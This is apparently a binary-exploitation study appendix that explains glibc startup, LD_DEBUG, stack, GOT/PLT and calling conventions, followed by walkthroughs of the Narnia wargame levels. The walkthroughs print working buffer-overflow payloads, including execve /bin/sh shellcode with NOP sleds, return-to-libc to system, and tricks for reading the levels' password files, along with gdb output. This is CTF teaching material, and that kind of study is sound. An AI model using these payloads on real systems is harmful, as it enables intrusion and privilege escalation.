From linuxbase The _libcstart_main() function shall perform any necessary initialization of the execution environment, call the main function with appropriate arguments, and handle the return from main(). If the main() function returns, the return value shall be passed to the exit() function.
int __libc_start_main(int (*main) (int, char * *, char * *), int argc, char * * ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end));
gmon_start
The function call_gmon_start initializes the gmon profiling system. This system is enabled when binaries are compiled with the -pg flag, and creates output for use with gprof(1). In the case of the scenario binary call_gmon_start is situated directly proceeding that _start function. The call_gmon_start function finds the last entry in the Global Offset Table (also known as __gmon_start__) and, if not NULL, will pass control to the specified address. The __gmon_start__ element points to the gmon initialization function, which starts the recording of profiling information and registers a cleanup function with atexit(). In our case however gmon is not in use, and as such __gmon_start__ is NULL.
Version Reference
GLib provides version information, primarily useful in configure checks for builds that have a configure script.
Check glib version in binary
objdump -p flagXX
flagXX: file format elf32-i386
Version References:
required from libc.so.6:
0x0d696910 0x00 02 GLIBC_2.0
or
objdump -T flagXX
flagXX: file format elf32-i386
DYNAMIC SYMBOL TABLE:
00000000 DF *UND* 00000000 GLIBC_2.0 puts
00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
080484cc g DO .rodata 00000004 Base _IO_stdin_used
Check glib version in your linux machine
ldd --version
ldd (Debian GLIBC 2.26-2) 2.26
If you get error like “no version information available”, create a file version.ld with the version required.
cat version.ld
GLIBC_2.0 {
};
and link it while compiling
gcc -shared -static-libgcc -fPIC -Wl,--version-script=version.ld,-Bstatic shell.c -o libc.so.6
LD_DEBUG environment variable
If the LD_DEBUG variable is set then the Linux dynamic linker will dump debug information which can be used to resolve most loading problems very quickly. To see the available options just run any program with the variable set to help, i.e.:
LD_DEBUG=help cat
Valid options for the LD_DEBUG environment variable are:
libs display library search paths
reloc display relocation processing
files display progress for input file
symbols display symbol table processing
bindings display information about symbol binding
versions display version dependencies
all all previous options combined
statistics display relocation statistics
unused determined unused DSOs
help display this help message and exit
If you want to debug a binary
LD_DEBUG all ./flagXX
D_DEBUG=all ./flagXX
4796:
4796: file=libc.so.6 [0]; needed by ./flagXX [0]
4796: find library=libc.so.6 [0]; searching
4796: search path=/var/tmp/flagXX/tls/i686/sse2/cmov:/var/tmp/flagXX/tls/i686/sse2:/var/tmp/flagXX/tls/i686/cmov:/var/tmp/flagXX/tls/i686:/var/tmp/flagXX/tls/sse2/cmov:/var/tmp/flagXX/tls/sse2:/var/tmp/flagXX/tls/cmov:/var/tmp/flagXX/tls:/var/tmp/flagXX/i686/sse2/cmov:/var/tmp/flagXX/i686/sse2:/var/tmp/flagXX/i686/cmov:/var/tmp/flagXX/i686:/var/tmp/flagXX/sse2/cmov:/var/tmp/flagXX/sse2:/var/tmp/flagXX/cmov:/var/tmp/flagXX (RPATH from file ./flagXX)
4796: trying file=/var/tmp/flagXX/tls/i686/sse2/cmov/libc.so.6
ulimit
ulimit User limits - limit the use of system-wide resources.
Syntax
ulimit [-acdfHlmnpsStuv] [limit]
Options
-S Change and report the soft limit associated with a resource.
-H Change and report the hard limit associated with a resource.
-a All current limits are reported.
-c The maximum size of core files created.
-d The maximum size of a process's data segment.
-f The maximum size of files created by the shell(default option)
-l The maximum size that can be locked into memory.
-m The maximum resident set size.
-n The maximum number of open file descriptors.
-p The pipe buffer size.
-s The maximum stack size.
-t The maximum amount of cpu time in seconds.
-u The maximum number of processes available to a single user.
-v The maximum amount of virtual memory available to the process.
ulimit provides control over the resources available to the shell and to processes started by it, on systems that allow such control.
The soft limit is the value that the kernel enforces for the corresponding resource. The hard limit acts as a ceiling for the soft limit.
Appendix-III Basic Concepts
The below has been completely taken from Binary Exploitation CTF101
Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program’s functions.
Registers
A register is a location within the processor that is able to store data, much like RAM.
Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not “general purpose registers” (GPRs).
On x86, the only 2 reserved registers are
rip which hold the address of the next instruction to execute and
rsp which hold the address of the stack respectively.
On x86, the same register can have different sized accesses for backwards compatability. For example,
the rax register is the full 64-bit register,
eax is the low 32 bits of rax,
ax is the low 16 bits,
al is the low 8 bits, and ah is the high 8 bits of ax (bits 8-16 of rax).
Stack
In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).
The esp/rsp register holds the address in memory where the bottom of the stack resides.
When something is pushed to the stack, esp decrements by 4 (or 8 on 64-bit x86), and the value that was pushed is stored at that location in memory.
Likewise, when a pop instruction is executed, the value at esp is retrieved (i.e. esp is dereferenced), and esp is then incremented by 4 (or 8).
..Note :: The stack “grows” down to lower memory addresses!
Conventionally, ebp/rbp contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp rather than an offset to esp.
A stack frame is essentially just the space used on the stack by a given function.
Uses
The stack is primarily used for a few things:
Storing function arguments
Storing local variables
Storing processor state between function calls
Example
Let’s compile a simple program and check for stack
#include <stdio.h>
void say_hi(const char * name) {
printf("Hello %s!\n", name);
}
int main(int argc, char ** argv) {
char * name;
if (argc != 2) {
return 1;
}
name = argv[1];
say_hi(name);
return 0;
}
gcc -g hello.c -o hello
Put breakpoints at the call of say_hi function
Check whats the esp and ebp value.
When a call instruction is executed; call instructions first push the current instruction pointer to the stack, then jump to their destination.
The first thing say_hi does is save the current ebp so that when it returns, ebp is back where main expects it to be.
Calling Conventions
To be able to call functions, there needs to be an agreed-upon way to pass arguments.
In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit
cdecl
In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:
int add(int a, int b, int c) {
return a + b + c;
}
would be invoked by pushing c, then b, then a.
SysV
For 64-bit binaries, function arguments are first passed in certain registers:
RDI
RSI
RDX
RCX
R8
R9
then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
Global Offset Table
The Global Offset Table (or GOT) is a section inside of programs that holds addresses of functions that are dynamically linked. common functions (like those in libc) are “linked” into the program so they can be saved once on disk and reused by every program.
Unless a program is marked full RELRO, the resolution of function to address in dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however functions are not mapped to their actual code until they’re first called. For example, in the following C snippet puts won’t be resolved to an address in libc until after it has been called once:
int main() {
puts("Hi there!");
puts("Ok bye now.");
return 0;
}
To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls “short circuit” straight to their implementation bypassing the dynamic resolver.
This has two important implications:
The GOT contains pointers to libraries which move around due to ASLR
The GOT is writable
PLT
Before a functions address has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small “stub” function which is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
Buffer
A buffer is any allocated space in memory where data (often user input) can be stored.
In the following C program name would be considered a stack buffer:
#include <stdio.h>
int main() {
char name[64] = {0};
read(0, name, 63);
printf("Hello %s", name);
return 0;
}
Buffers could also be global variables:
#include <stdio.h>
char name[64] = {0};
int main() { code_snippet }
Or dynamically allocated on the heap like
char *name = malloc(64);
memset(name, 0, 64);
Buffer Overflow Examples
Let’s see a simple example of binary exploitation Narnia0 where we have to write a written value.
#include <stdio.h> #include <stdlib.h> int main(){ long val=0x41414141; char buf[20]; printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); printf("Here is your chance: "); scanf("%24s",&buf); printf("buf: %s\n",buf); printf("val: 0x%08x\n",val); if(val==0xdeadbeef) system("/bin/sh"); else { printf("WAY OFF!!!!\n"); exit(1); } return 0; }In this example, value of variable val can be overwritten by overflowing buf. Another small observation is scanf function scans 24 characters. If you directly write 20 “A” and the address it won’t work as the val doesn’t matches. So, we have to use python print command. If we use
python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0you will see that the value would match but the shell is exited. To keep the shell active, we need to use cat as shown below:
(python -c 'print "A"*20 + "\xef\xbe\xad\xde"';cat) | ./narnia0
In another example below Narnia1
#include <stdio.h> int main(){ int (*ret)(); if(getenv("EGG")==NULL){ printf("Give me something to execute at the env-variable EGG\n"); exit(1); } printf("Trying to execute EGG!\n"); ret = getenv("EGG"); ret(); return 0; }We need to set a environment variable EGG with an shellcode. Previously, I tried with
export EGG="\bin\sh" and export EGG="\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"Shellcode were taken from the Shellstorm website. However, both failed with Segmentation fault. superkojiman, barrebas helped me with and told that if I write
export EGG=`python -c 'print "\xCC"'`It should sigtrap. “xCC” acts as a software breakpoint, basically an INT3, It tells you whether your shellcode is stored properly & executed, if the program receives SIGTRAP, you know you’re good to go, and it’s a good way to make sure you’ve properly redirected execution to your shellcode. You can further put “xCC” anywhere in the shellcode, if it crashes before “xCC”, you know for sure that your shellcode has bad characters. They suggested to export the EGG variable as
export EGG=`python -c 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`and it worked like a charm.
In another example Narnia2
#include <stdio.h> #include <string.h> #include <stdlib.h> int main(int argc, char * argv[]){ char buf[128]; if(argc == 1){ printf("Usage: %s argument\n", argv[0]); exit(1); } strcpy(buf,argv[1]); printf("%s", buf); return 0; }It’s to easy that buffer overflow vulnerability exists because of strcpy. Let’s see what is the offset for this.
ulimit -c unlimited ./narnia2 `/usr/share/metasploit-framework/tools/pattern_create.rb 200` Segmentation fault (core dumped) gdb -q -c core ./narnia2 #0 0x37654136 in ?? () /usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136 [*] Exact match at offset 140 narnia2@melinda:~$ gdb -q /narnia/narnia2 (gdb) disassemble main Dump of assembler code for function main: **Snip** 0x080484a0 <+67>: mov %eax,(%esp) 0x080484a3 <+70>: call 0x8048320 <strcpy@plt> **Snip** End of assembler dump. (gdb) br *main+70 Breakpoint 1 at 0x80484a3 (gdb) run `python -c 'print "A"*140 + "BBBB"'` Starting program: /games/narnia/narnia2 `python -c 'print "A"*140 + "BBBB"'` Breakpoint 1, 0x080484a3 in main () (gdb) n 0x42424242 in ?? ()Let’s see the stack after the strcpy, which would tell us the probable address we want to redirect execution.
(gdb) x/80xw $esp+400 0xffffd7e0: 0x0000000f 0xffffd80b 0x00000000 0x00000000 0xffffd7f0: 0x00000000 0x00000000 0x1d000000 0xa9c79d1b 0xffffd800: 0xe1a67367 0xc19fc850 0x6996cde4 0x00363836 0xffffd810: 0x2f000000 0x656d6167 0x616e2f73 0x61696e72 0xffffd820: 0x72616e2f 0x3261696e 0x41414100 0x41414141 0xffffd830: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd840: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd850: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd860: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd870: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd880: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd890: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd8a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd8b0: 0x41414141 0x42424241 0x44580042 0x45535f47 0xffffd8c0: 0x4f495353 0x44495f4e 0x3939383d 0x53003733Let pick a shellcode from shellstorm for a Linux x86 execuve /bin/sh and calculate the number of NOPs
narnia2@melinda:~$ python -c 'print len("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")' 23 narnia2@melinda:~$ bc 140-23 117 narnia2@melinda:~$ /narnia/narnia2 `python -c 'print "\x90"*117 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + "\x50\xd8\xff\xff"'` $ cat /etc/narnia_pass/narnia3 ********** $
In another example Narnia3
#include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> #include <string.h> int main(int argc, char **argv){ int ifd, ofd; char ofile[16] = "/dev/null"; char ifile[32]; char buf[32]; if(argc != 2){ printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]); exit(-1); } /* open files */ strcpy(ifile, argv[1]); if((ofd = open(ofile,O_RDWR)) < 0 ){ printf("error opening %s\n", ofile); exit(-1); } if((ifd = open(ifile, O_RDONLY)) < 0 ){ printf("error opening %s\n", ifile); exit(-1); } /* copy from file1 to file2 */ read(ifd, buf, sizeof(buf)-1); write(ofd,buf, sizeof(buf)-1); printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile); /* close 'em */ close(ifd); close(ofd); exit(1); }Superkojiman notes explain this best, copied here with permission, thanks superkojiman :)
narnia3@melissa:/narnia$ ./narnia3 /etc/motd copied contents of /etc/motd to a safer place... (/dev/null)We can use this program to read the contents of /etc/narnia_pass/narnia4, but the output is written to /dev/null. We control the input file and the output file is set as /dev/null. However, because of the way the stack is laid out, we can write past the ifile buffer and overwrite the value of ofile. This lets us replace /dev/null with another file of our choosing. Here’s what the stack looks like:
+---------+ | ret | | sfp | | ofd | | ifd | | ofile | | ifile | | buf | +---------+ <- espifile and ofile are 32-byte arrays. We can compile the program with -ggdb and examine it in gdb
# gcc -ggdb -m32 -fno-stack-protector -Wl,-z,norelro narnia3.c -o narnia3 # gdb -q narnia3If we disas main, we can see that strcpy is called at *main+100:
0x08048551 <+93>: lea 0x38(%esp),%eax 0x08048555 <+97>: mov %eax,(%esp) 0x08048558 <+100>: call 0x8048400 <strcpy@plt> 0x0804855d <+105>: movl $0x2,0x4(%esp) 0x08048565 <+113>: lea 0x58(%esp),%eax 0x08048569 <+117>: mov %eax,(%esp)We set a breakpoint there and run the program with the following arguments:
(gdb) r `python -c 'print "A"*32 + "/tmp/hack"'` Starting program: /root/wargames/narnia/3/narnia3 `python -c 'print "A"*32 + "/tmp/hack"'` Breakpoint 1, 0x08048558 in main (argc=2, argv=0xbffff954) at narnia3.c:37 37 strcpy(ifile, argv[1]);At the first breakpoint, we examine the local variables
(gdb) i locals ifd = 134514299 ofd = -1208180748 ofile = "/dev/null\000\000\000\000\000\000" ifile = "x\370\377\277\234\203\004\b\200\020\377\267\214\230\004\b\250\370\377\277\211\206\004\b$\243\374\267\364\237", <incomplete sequence \374\267> buf = "\370\370\377\267\364\237\374\267\371\234\367\267\245B\352\267h\370\377\277չ\350\267\364\237\374\267\214\230\004\b"ofile is set to /dev/null as expected. We’ll step to the next instruction and check again.
(gdb) s 38 if((ofd = open(ofile,O_RDWR)) < 0 ){ (gdb) i locals ifd = 134514299 ofd = -1208180748 ofile = "/tmp/hack\000\000\000\000\000\000" ifile = 'A' <repeats 32 times> buf = "\370\370\377\267\364\237\374\267\371\234\367\267\245B\352\267h\370\377\277չ\350\267\364\237\374\267\214\230\004\b" As expected, ofile has been overwritten to /tmp/hack. However ifile is now AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack so in order to read /etc/narnia_pass/narnia4, we need to create a directory AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp and symlink /etc/narnia_pass/narnia4 to AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hacknarnia3@melissa:/tmp/skojiman3$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp narnia3@melissa:/tmp/skojiman3$ ln -s /etc/narnia_pass/narnia4 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hackNext we need to create the output file /tmp/hack that ofile points to
narnia3@melissa:/tmp/skojiman3$ touch /tmp/hack narnia3@melissa:/tmp/skojiman3$ chmod 666 /tmp/hack narnia3@melissa:/tmp/skojiman3$ ls -l /tmp/hack -rw-rw-rw- 1 narnia3 narnia3 0 2012-11-24 22:58 /tmp/hackFinally, execute /narnia/narnia3 as follows:
narnia3@melissa:/tmp/skojiman3$ /narnia/narnia3 `python -c 'print "A"*32 + "/tmp/hack"'` copied contents of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/tmp/hack to a safer place... (/tmp/hack) narnia3@melissa:/tmp/skojiman3$ cat /tmp/hack thaenohtai ��*������e���@�narnia3@melissa:/tmp/skojiman3$
Let’s see another example Narnia6.
#include <stdio.h> #include <stdlib.h> #include <string.h> extern char **environ; // tired of fixing values... // - morla unsigned long get_sp(void) { __asm__("movl %esp,%eax\n\t" "and $0xff000000, %eax" ); } int main(int argc, char *argv[]){ char b1[8], b2[8]; int (*fp)(char *)=(int(*)(char *))&puts, i; if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); } /* clear environ */ for(i=0; environ[i] != NULL; i++) memset(environ[i], '\0', strlen(environ[i])); /* clear argz */ for(i=3; argv[i] != NULL; i++) memset(argv[i], '\0', strlen(argv[i])); strcpy(b1,argv[1]); strcpy(b2,argv[2]); //if(((unsigned long)fp & 0xff000000) == 0xff000000) if(((unsigned long)fp & 0xff000000) == get_sp()) exit(-1); fp(b1); exit(1); }Stack is not executable for this binary. This binary is an example of “return-to-libc” attack is a computer security attack usually starting with a buffer overflow in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the process’ executable memory, rendering the NX bit feature useless (if present) and ridding the attacker of the need to inject their own code.
gdb -q narnia6 Reading symbols from /home/bitvijays/narnia6...(no debugging symbols found)...done. gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : disabled gdb-peda$Let’s compile the source on the local and check what happens:
gcc -m32 -ggdb -fno-stack-protector -Wall narnia6.c -o narnia61If you see carefully, we passed A8 + BBBB + “ “ + “C”8 + DDDD, which resulted in
gdb -q ./narnia61 gdb-peda$ pdisass main Dump of assembler code for function main: 0x080486d2 <+330>: call 0x8048450 <exit@plt> 0x080486d7 <+335>: lea eax,[esp+0x20] 0x080486db <+339>: mov DWORD PTR [esp],eax 0x080486de <+342>: mov eax,DWORD PTR [esp+0x28] 0x080486e2 <+346>: call eax 0x080486e4 <+348>: mov DWORD PTR [esp],0x1 0x080486eb <+355>: call 0x8048450 <exit@plt> End of assembler dump. gdb-peda$ br *main+346 Breakpoint 1 at 0x80486e2: file narnia6.c, line 48. gdb-peda$ run `python -c 'print "A"*8 + "BBBB" + " " + "C"*8 + "DDDD"'` [-------------------------------------code-------------------------------------] 0x80486d7 <main+335>: lea eax,[esp+0x20] 0x80486db <main+339>: mov DWORD PTR [esp],eax 0x80486de <main+342>: mov eax,DWORD PTR [esp+0x28] => 0x80486e2 <main+346>: call eax 0x80486e4 <main+348>: mov DWORD PTR [esp],0x1 0x80486eb <main+355>: call 0x8048450 <exit@plt> 0x80486f0 <__libc_csu_fini>: push ebp 0x80486f1 <__libc_csu_fini+1>: mov ebp,esp Guessed arguments: arg[0]: 0xffffd380 ("DDDD") Breakpoint 1, 0x080486e2 in main (argc=0x3, argv=0xffffd444) at narnia6.c:48 48 fp(b1); gdb-peda$ p b1 $1 = "DDDD\000AAA" gdb-peda$ p b2 $2 = "CCCCCCCC" gdb-peda$ p puts $3 = {<text variable, no debug info>} 0xf7eb3360 <puts> gdb-peda$ p system $4 = {<text variable, no debug info>} 0xf7e8bc30 <system> gdb-peda$ p &b1 $5 = (char (*)[8]) 0xffffd380 gdb-peda$ x/50xw 0xffffd350 0xffffd360: 0xffffd380 0xffffd5df 0x0000003b 0x0804874b 0xffffd370: 0x00000003 0xffffd444 0x43434343 0x43434343 0xffffd380: 0x44444444 0x41414100 0x42424242 0x00000000 0xffffd390: 0x08048700 0xf7fb0ff4 0xffffd418 0xf7e66e46 0xffffd3a0: 0x00000003 0xffffd444 0xffffd454 0xf7fde860 gdb-peda$ p fp $6 = (int (*)(char *)) 0x42424242 gdb-peda$ p &fp $7 = (int (**)(char *)) 0xffffd388 gdb-peda$ p $fp $8 = (void *) 0xffffd398The address of fp “p &fp” is 0xffffd3888 which has a value of (“p fp”) 0x42424242. As previously the stack is NoteXecutable, but stdlib.h is included in the C Program. Stdlib.h includes system call which has an address of (“p system”) 0xf7e8bc30. Further DDDD overwrites AAAA with the Null byte.
narnia6@melinda:/narnia$ ./narnia6 `python -c 'print "A"*8 + "\x40\x1c\xe6\xf7" + " " + "C"*8 + "/bin/sh"'` $ cat /etc/narnia_pass/narnia7
Let’s see another example where we have to use a environment variable to invoke a shell Narnia8.
#include <stdio.h> #include <stdlib.h> #include <string.h> // gcc's variable reordering fucked things up // to keep the level in its old style i am // making "i" global unti i find a fix // -morla int i; void func(char *b){ char *blah=b; char bok[20]; //int i=0; memset(bok, '\0', sizeof(bok)); for(i=0; blah[i] != '\0'; i++) bok[i]=blah[i]; printf("%s\n",bok); } int main(int argc, char **argv){ if(argc > 1) func(argv[1]); else printf("%s argument\n", argv[0]); return 0; }Let’s see what is happening here: for loop in function func copies data from blah to bok character array until a null character is found. Let’s see how the stack would look like
<bok character array><blah pointer><fp><ret><pointer b>Let’s confirm this by using gdb? We put an breakpoint on printf function in the func function.
0xffffd670: 0x08048580 0xffffd688 0x00000014 0xf7e54f53 0xffffd680: 0x00000000 0x00ca0000 0x41414141 0x41414141 0xffffd690: 0x41414141 0x41414141 0x00414141 0xffffd8b1 0xffffd6a0: 0x00000002 0xffffd764 0xffffd6c8 0x080484cd 0xffffd6b0: 0xffffd8b1 0xf7ffd000 0x080484fb 0xf7fca000Address 0xffffd689 marks the start of the character buffer bok. I entered 19 A so it’s 0x41 19 times followed by null 0x00. Followed by that is 0xffffd8b1 (Value of Blah pointer). Followed by fp 12 bytes <0x00000002 0xffffd764 0xffffd6c8>. Followed by 0x080484cd which is the return address
(gdb) x/s 0x080484cd 0x80484cd <main+31>: "\353\025\213E\f\213"followed by pointer b (0xffffd8b1). Let’s see what’s at location 0xffffd8b1
(gdb) x/20wx 0xffffd8b1 0xffffd8b1: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd8c1: 0x00414141 0x5f474458 0x53534553 0x5f4e4f49Let’s see what happens when we try to enter more than the 19 character (buffer size of bok - 1 byte (for null character))
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20'` AAAAAAAAAAAAAAAAAAAA���� narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20'` | hexdump 0000000 4141 4141 4141 4141 4141 4141 4141 4141 0000010 4141 4141 d8bf ffff 0a02 000001aAs expected, we get A followed by some garbage. which is the address where blah is pointing. We know that we can overwrite the RET address by
# `python -c 'print "A"*20 + "\x90\x90\x90\x90" + "A"*12 + "BBBB"'`
Let’s see what happens when we do this. After copying 20 A it copies x90 and makes blah pointer from 0xffffd8bf to 0xffffd890. Because of the for loop
for(i=0; blah[i] != '\0'; i++)It now copies the character from 0xffffd890 reference i.e 0xffffd890 + i value. Suppose it copied the character 0x41. The address becomes 0xffff4190 and now for loop searches from that address until a null character is found.
(gdb) x/20xw $esp 0xffffd660: 0xffffd678 0x00000000 0x00000014 0xf7e54f53 0xffffd670: 0x00000000 0x00ca0000 0x41414141 0x41414141 0xffffd680: 0x41414141 0x41414141 0x41414141 0xffffd890 0xffffd690: 0x00000002 0xffffd754 0xffffd6b8 0x080484cd 0xffffd6a0: 0xffffd89c 0xf7ffd000 0x080484fb 0xf7fca000 (gdb) x/10xw 0xffffd890 0xffffd890: 0x2f61696e 0x6e72616e 0x00386169 0x41414141 0xffffd8a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd8b0: 0x90909090 0x41414141 (gdb) x/20xw $esp 0xffffd660: 0x08048580 0xffffd678 0x00000014 0xf7e54f53 0xffffd670: 0x00000000 0x00ca0000 0x41414141 0x41414141 0xffffd680: 0x41414141 0x41414141 0x41414141 0xffff4190 0xffffd690: 0x00000002 0xffffd754 0xffffd6b8 0x080484cd 0xffffd6a0: 0xffffd89c 0xf7ffd000 0x080484fb 0xf7fca000 (gdb) x/10xw 0xffff4190 0xffff4190: 0x00000000 0x00000000 0x00000000 0x00000000 0xffff41a0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffff41b0: 0x00000000 0x00000000If we can somehow keep/change the blah pointer back to it’s original value we may overwrite the RET pointer (after 12 bytes). Let’s see how 0xffffd89c looks when is used
`python -c 'print "A"*20 + "\x90\x90\x90\x90" + "A"*12 + "BBBB"'`(gdb) x/30xw 0xffffd89c 0xffffd89c: 0x41414141 0x41414141 0x41414141 0x41414141 0xffffd8ac: 0x41414141 0x90909090 0x41414141 0x41414141 0xffffd8bc: 0x41414141 0x42424242 0x47445800 0x5345535fWhen we used the below with the address, we were able to overwrite the RET by BBBB. Now, we control the EIP :)
(gdb) run `python -c 'print "A"*20 + "\x9c\xd8\xff\xff" + "A"*12 + "BBBB"'` (gdb) x/20xw $esp 0xffffd660: 0x08048580 0xffffd678 0x00000014 0xf7e54f53 0xffffd670: 0x00000000 0x00ca0000 0x41414141 0x41414141 0xffffd680: 0x41414141 0x41414141 0x41414141 0xffffd89c 0xffffd690: 0x41414141 0x41414141 0x41414141 0x42424242Let’s export a shellcode using a environment variable check it’s address on the stack and redirect the flow of our code to it. Notice the number of NOPs we have put for easy identification plus reachability.
export EGG=`python -c 'print "\x90"*90 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"'`Searching our environment variable we get it at address 0xffffd8d4.
(gdb) x/100xw $esp+500 0xffffd7e4: 0x0000000f 0xffffd80b 0x00000000 0x00000000 0xffffd7f4: 0x00000000 0xde000000 0x1a2a5992 0xf11444ea 0xffffd804: 0x11433cf3 0x694a71a2 0x00363836 0x672f0000 0xffffd814: 0x73656d61 0x72616e2f 0x2f61696e 0x6e72616e 0xffffd824: 0x00386169 0x41414141 0x41414141 0x41414141 0xffffd834: 0x41414141 0x41414141 0xffffd828 0x41414141 0xffffd844: 0x41414141 0x41414141 0x42424242 0x47445800 0xffffd854: 0x5345535f 0x4e4f4953 0x3d44495f 0x35343239 0xffffd864: 0x45485300 0x2f3d4c4c 0x2f6e6962 0x68736162 0xffffd874: 0x52455400 0x74783d4d 0x006d7265 0x5f485353 0xffffd884: 0x45494c43 0x353d544e 0x34392e39 0x2e31362e 0xffffd894: 0x20343731 0x37373835 0x32322032 0x48535300 0xffffd8a4: 0x5954545f 0x65642f3d 0x74702f76 0x31312f73 0xffffd8b4: 0x5f434c00 0x3d4c4c41 0x47450043 0x90903d47 0xffffd8c4: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd8d4: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd8e4: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd8f4: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd904: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd914: 0x90909090 0x90909090 0x99580b6a 0x2f2f6852 0xffffd924: 0x2f686873 0x896e6962 0xcdc931e3 0x53550080 0xffffd934: 0x6e3d5245 0x696e7261 0x4c003861 0x4f435f53 0xffffd944: 0x53524f4c 0x3d73723d 0x69643a30 0x3b31303dLet’s redirect our program to 0xffffd8d4 to get the shell
(gdb) run `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "A"*12 + "\xd4\xd8\xff\xff"'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /games/narnia/narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "A"*12 + "\xd4\xd8\xff\xff"'` Breakpoint 1, 0x080484a7 in func () (gdb) c Continuing. AAAAAAAAAAAAAAAAAAAA(���AAAAAAAAAAAA����(��� process 19900 is executing new program: /bin/dash Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command. Error in re-setting breakpoint 1: No symbol "func" in current context. Error in re-setting breakpoint 1: No symbol "func" in current context. Error in re-setting breakpoint 1: No symbol "func" in current context. $Trying this without gdb didn’t work because the address of character array changes
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` AAAAAAAAAAAAAAAAAAAA(A�� narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x28\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` | hexdump 0000000 4141 4141 4141 4141 4141 4141 4141 4141 0000010 4141 4141 4128 ffff 0a02 000001aChanging 28 to 0a just by chance gave me the correct address to be pointed at
narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x0a\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` | hexdump 0000000 4141 4141 4141 4141 4141 4141 4141 4141 0000010 4141 4141 d837 ffff 0a03narnia8@melinda:/narnia$ ./narnia8 `python -c 'print "A"*20 + "\x37\xd8\xff\xff" + "B"*12 + "\xd4\xd8\xff\xff"'` AAAAAAAAAAAAAAAAAAAA7���BBBBBBBBBBBB����7��� $For example, below you need the address of secret to write the new value 0x1337beef.
unsigned secret = 0xdeadbeef; int main(int argc, char **argv){ unsigned *ptr; unsigned value; char key[33]; FILE *f; printf("Welcome! I will grant you one arbitrary write!\n"); printf("Where do you want to write to? "); scanf("%p", &ptr); printf("Okay! What do you want to write there? "); scanf("%p", (void **)&value); printf("Writing %p to %p...\n", (void *)value, (void *)ptr); *ptr = value; printf("Value written!\n"); if (secret == 0x1337beef){ printf("Woah! You changed my secret!\n"); printf("I guess this means you get a flag now...\n"); f = fopen("flag.txt", "r"); fgets(key, 32, f); fclose(f); puts(key); exit(0); } printf("My secret is still safe! Sorry.\n"); }
